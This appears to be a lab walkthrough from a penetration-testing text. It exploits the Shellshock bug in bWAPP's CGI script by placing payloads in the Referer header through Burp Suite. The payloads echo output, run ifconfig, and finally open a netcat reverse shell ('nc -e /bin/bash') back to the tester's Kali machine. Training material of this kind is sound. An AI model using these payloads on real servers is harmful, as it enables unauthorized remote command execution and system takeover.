Browse to bee-box over HTTP (http://192.168.56.12/bWAPP/) and log in to start this exercise:

1. In the Choose your bug: drop-down box, select Shellshock Vulnerability (CGI) and then click on Hack:

In the text, we can see something interesting: Current user: www-data. This may mean that the page is using system calls to get the username. It also gives us a hint to attack the referrer.

2. Let's see what is happening behind the scenes and use Burp Suite to record the requests and reload the page. If we look at the proxy's history:

We can see that there is an iframe calling a shell script: /cgi-bin/shellshock.sh, which might be the script vulnerable to Shellshock.

3. Let's take the hint and try to attack the referrer of shellshock.sh. We first need to configure Burp Suite to intercept server responses. Go to Options in the Proxy tab and check the box with the text Intercept responses based on the following rules.
4. Now, set Burp Suite to intercept and then reload shellshock.php.
5. In Burp Suite, click Forward until you get to the GET request to /bWAPP/cgi-bin/shellshock.sh. Then, replace the Referer with () { :;}; echo "Vulnerable:" as shown in the following screenshot:

6. Click Forward again, and once more in the request to the .ttf file, and then we should get the response from shellshock.sh, as shown in the following screenshot:

The response now has a new header parameter called Vulnerable. This is because it integrated the output of the echo command to the HTML header we submitted, now we can take this further and execute more interesting commands.

7. Now, try the () { :;}; echo "Vulnerable:" $(/bin/sh -c "/sbin/ifconfig") command. As the result shows, the command's result is included in the response header:

8. Being able to execute commands remotely on a server is a huge advantage in a penetration test and the next natural step is to obtain a remote shell, meaning a direct connection where we can send more elaborate commands. Open a Terminal in Kali Linux and set up a listening network port with the following command: nc -vlp 12345.
9. Now go to Burp Suite proxy's history, select any request to shellshock.sh, right-click on it, and send it to the repeater.

11. Once in the repeater, change the value of Referer to: () { :;}; echo "Vulnerable:" $(/bin/sh -c "nc -e /bin/bash 192.168.56.10 12345"). In this case, 192.168.56.10 is the address of our Kali machine.
12. Click Go. If we check our Terminal, we can see the connection is established; issue a few commands to check whether or not we have a remote shell: